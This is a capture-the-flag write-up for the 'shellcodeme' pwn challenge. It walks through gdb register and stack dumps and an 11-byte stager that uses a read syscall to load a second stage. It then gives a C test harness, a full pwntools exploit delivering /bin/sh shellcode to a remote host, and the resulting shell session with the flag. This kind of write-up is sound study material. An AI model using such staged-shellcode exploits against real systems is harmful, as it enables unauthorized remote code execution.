Tags: pwn
Rating:
## === shellcodeme (Pwn: 62 solves / 420 pts) ===
I checked the state of the registers, the stack and the memory map right after the `call rbp` that enters the shellcode, with ASLR disabled.
The register state is the following.
```
RAX: 0xa ('\n')
RBX: 0x4000 ('')
RCX: 0xad6ff050f585f01
RDX: 0x7ffff7ff300b --> 0xa ('\n')
RSI: 0x7ffff7dd3790 --> 0x0
RDI: 0x7ffff7dd18e0 --> 0xfbad2088
```
The stack is the following (the annotations mark which slot each pop of the stager consumes).
```
0000| 0x7fffffffdda8 --> 0x40072f (<main+207>: xor edi,edi) ==> pop rdx
0008| 0x7fffffffddb0 --> 0x0
0016| 0x7fffffffddb8 --> 0x100000000
0024| 0x7fffffffddc0 --> 0x1000000000000
0032| 0x7fffffffddc8 --> 0x0
0040| 0x7fffffffddd0 --> 0x0 ==> pop rdi
0048| 0x7fffffffddd8 --> 0x0 ==> pop rax
0056| 0x7fffffffdde0 --> 0x0
```
The memory map is the following.
```
Start End Perm Name
0x00400000 0x00401000 r-xp /Pwn_shellcodeme/shellcodeme
0x00600000 0x00601000 r-xp /Pwn_shellcodeme/shellcodeme
0x00601000 0x00602000 rwxp /Pwn_shellcodeme/shellcodeme
0x00602000 0x00624000 rwxp [heap]
0x00007ffff7a0d000 0x00007ffff7bcd000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 ---p /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 rwxp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd3000 0x00007ffff7dd7000 rwxp mapped
```
My idea was to use the read syscall to load the real shellcode into the area rsi points to, taking advantage of the convenient values already sitting on the stack.
The stack on the server is laid out the same way.
Below is the register state after the pops into rdx, rdi and rax.
```
RAX: 0x0
RBX: 0x4000 ('')
RCX: 0xad6ff050f585f01
RDX: 0x40072f (<main+207>: xor edi,edi)
RSI: 0x7ffff7dd3790 --> 0x0
RDI: 0x0
```
With rax = 0 (SYS_read), rdi = 0 (stdin), rsi pointing into the rwx mapping at 0x7ffff7dd3000 and rdx = 0x40072f serving as an oversized length, the syscall reads the second-stage shellcode to rsi's address, and `call rsi` then jumps into it.
The assembled stager is the following.
```
0x7ffff7ff3000: pop rdx
0x7ffff7ff3001: pop rdi
0x7ffff7ff3002: pop rdi
0x7ffff7ff3003: pop rdi
0x7ffff7ff3004: pop rdi
0x7ffff7ff3005: pop rdi
0x7ffff7ff3006: pop rax
0x7ffff7ff3007: syscall
0x7ffff7ff3009: call rsi
```
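To check the mechanics of the stager outside the challenge, here is an added example written for this page (my own harness, not code from the original writeup or the challenge): it copies the 11 stage-1 bytes into an rwx page, points rsp at a fake stack holding the same values as the dump above, points rsi into the page, and feeds a constructed second stage over a pipe on stdin instead of the network. The second stage (`mov eax, 0x1337 ; ret`), the fake stack layout, the trailing `ret` placed after the stager so the demo can return to C, and the buffer offsets are all assumptions for the demo; it requires x86-64 Linux.

```c
/* Added harness for the 11-byte stager from the writeup (not the original
 * exploit).  Runs stage 1 against a fake stack shaped like the gdb dump,
 * with stdin served from a pipe.  x86-64 Linux only. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20  /* Linux value, in case strict headers hide it */
#endif

/* Stage 1 exactly as assembled on the page:
 * pop rdx ; pop rdi x5 ; pop rax ; syscall ; call rsi */
static const unsigned char STAGER[] =
    "\x5a\x5f\x5f\x5f\x5f\x5f\x58\x0f\x05\xff\xd6";

/* Constructed stand-in for the /bin/sh payload: mov eax, 0x1337 ; ret.
 * It only proves that control reached the bytes read() dropped at rsi. */
static const unsigned char STAGE2[] = "\xb8\x37\x13\x00\x00\xc3";

typedef struct {
    long rax;           /* rax after the second stage returns */
    int stage2_landed;  /* 1 if read() placed STAGE2 at rsi */
} demo_result;

/* Switch to the fake stack, point rsi at buf and jump to the stager.
 * Offset 56 of the fake stack receives the address that the `ret` placed
 * after the stager returns to, which is how control comes back here. */
static long run_stager(unsigned char *page, uint64_t *fake_sp, unsigned char *buf)
{
    long rax;
    __asm__ volatile(
        "lea 1f(%%rip), %%rcx\n\t"
        "mov %%rcx, 56(%[sp])\n\t"   /* resume address for the ret at page+11 */
        "mov %%rsp, %%rbx\n\t"       /* park the real stack pointer */
        "mov %[sp], %%rsp\n\t"       /* the pops now consume the fake frame */
        "mov %[buf], %%rsi\n\t"      /* rsi: read() destination and call target */
        "jmp *%[page]\n\t"
        "1:\n\t"
        "mov %%rbx, %%rsp\n\t"
        : "=&a"(rax)
        : [sp] "r"(fake_sp), [buf] "r"(buf), [page] "r"(page)
        : "rbx", "rcx", "rdx", "rsi", "rdi", "r11", "memory", "cc");
    return rax;
}

demo_result run_demo(void)
{
    demo_result res = { -1, 0 };
    unsigned char *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return res;
    memcpy(page, STAGER, sizeof STAGER - 1);
    page[sizeof STAGER - 1] = 0xc3;      /* ret: hands control back after stage 2 */
    unsigned char *buf = page + 0x100;   /* plays the rsi area (0x7ffff7dd3790 on the page) */

    /* Fake stack laid out like the dump: rdx <- 0x40072f, five pops walk rdi
     * down to the 0 at offset 40, rax <- 0 from offset 48.  Offset 48 is then
     * reused by call rsi's return address; offset 56 is filled by run_stager. */
    uint64_t fake_stack[16] = {
        0x40072f, 0, 0x100000000ULL, 0x1000000000000ULL, 0, 0, 0, 0,
    };

    /* Feed stdin from a pipe so read(0, rsi, rdx) returns our second stage.
     * rdx = 0x40072f is oversized, but the kernel copies only what is available. */
    int fds[2];
    if (pipe(fds) < 0) { munmap(page, 4096); return res; }
    if (write(fds[1], STAGE2, sizeof STAGE2 - 1) != (ssize_t)(sizeof STAGE2 - 1)) {
        close(fds[0]); close(fds[1]); munmap(page, 4096); return res;
    }
    close(fds[1]);
    int saved_stdin = dup(0);
    dup2(fds[0], 0);
    close(fds[0]);

    res.rax = run_stager(page, fake_stack, buf);
    res.stage2_landed = memcmp(buf, STAGE2, sizeof STAGE2 - 1) == 0;

    if (saved_stdin >= 0) { dup2(saved_stdin, 0); close(saved_stdin); }
    munmap(page, 4096);
    return res;
}

int main(void)
{
    demo_result r = run_demo();
    printf("rax after stage 2 = 0x%lx, stage 2 landed at rsi: %s\n",
           (unsigned long)r.rax, r.stage2_landed ? "yes" : "no");
    return (r.rax == 0x1337 && r.stage2_landed) ? 0 : 1;
}
```

The fake stack is what makes the five `pop rdi` worth it: each pop walks rsp down the dump until rdi lands on the zero at offset 40, and the very next slot supplies the zero for rax, so a single register pattern covers fd, syscall number and length without a single immediate in the stager. Changing the fake stack values shows immediately which pops matter (put a non-zero value at offset 40 and read() is called on a bogus fd).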
The final exploit code is the following.
```
from pwn import *
import sys

context(os='linux', arch='amd64')
#context.log_level = 'debug'

# Stage 2: a plain /bin/sh shellcode, delivered through the read() syscall
# that the stager below performs.
shellcode = asm(shellcraft.amd64.linux.sh())

BINARY = './shellcodeme'
elf = ELF(BINARY)

if len(sys.argv) > 1 and sys.argv[1] == 'r':
    HOST = "shellcodeme.420blaze.in"
    PORT = 420
    s = remote(HOST, PORT)
else:
    s = process(BINARY)

s.recvuntil(b"Shellcode?\n")

# Stage 1 (11 bytes), built from the values already on the stack:
#   pop rdx      -> 0x40072f, a code address reused as a large read() length
#   pop rdi * 5  -> walk down to the 0 at offset 40, so rdi = 0 (stdin)
#   pop rax      -> 0 (SYS_read)
#   syscall      -> read(0, rsi, rdx); rsi already points into an rwx mapping
#   call rsi     -> jump to the shellcode that was just read
#buf = b"\x5a\x5f\x5f\x5f\x5f\x5f\x58\x0f\x05\xff\xd6"
buf = asm("pop rdx")
buf += asm("pop rdi")*5
buf += asm("pop rax")
buf += asm("syscall")
buf += asm("call rsi")
s.sendline(buf)

# Let the program consume stage 1 before stage 2 arrives, so its first read()
# does not swallow both and the stager's own read() still has data to fetch.
sleep(0.1)
s.sendline(shellcode)
s.interactive()
```
The execution result is the following.
```
ubuntu:~/Pwn_shellcodeme$ python solve.py r
[*] '/Pwn_shellcodeme/shellcodeme'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to shellcodeme.420blaze.in on port 420: Done
[*] Switching to interactive mode
$ id
uid=1000(shellcodeme) gid=1000(shellcodeme) groups=1000(shellcodeme)
$ ls
flag
shellcodeme
$ cat flag
blaze{g0lf3d_y0ur_sh3llc0d3's_un1qu3_byt3z}
```